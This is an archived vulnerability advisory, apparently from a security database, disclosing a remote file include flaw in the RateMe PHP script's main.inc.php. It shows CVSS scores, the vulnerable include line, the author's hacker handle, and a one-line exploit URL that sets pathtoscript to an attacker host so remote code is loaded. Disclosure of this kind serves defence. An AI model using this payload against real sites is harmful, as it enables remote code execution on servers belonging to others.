RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability

2006.12.20
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: + + tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: + + tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: + + ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: + + ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: + + ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: + + ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: + + ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. + + ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. + + ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. + + tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. + + jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. + + ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. + + ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. + + iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; + + ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, + + jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, + + jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: + + iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii + + ;;.. ii;; + + .. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++ ######################################################################## ################################# # Affected Script: RateMe # Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability # Author: Al7ejaz Hacker # Website: http://www.planetluc.com/en/ not free version # Discovered: 15/12/2006 # Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com ######################################################################## ################################# ######################################################################## ################################# # # Description : # File infected : main.inc.php , line 17 # # echo "n<!-- Start RateMe v$version output -->nn<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>n<div class='votingtxt'>"; # include($pathtoscript.'db_connect.inc.php'); # <== # # Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke # ######################################################################## ################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top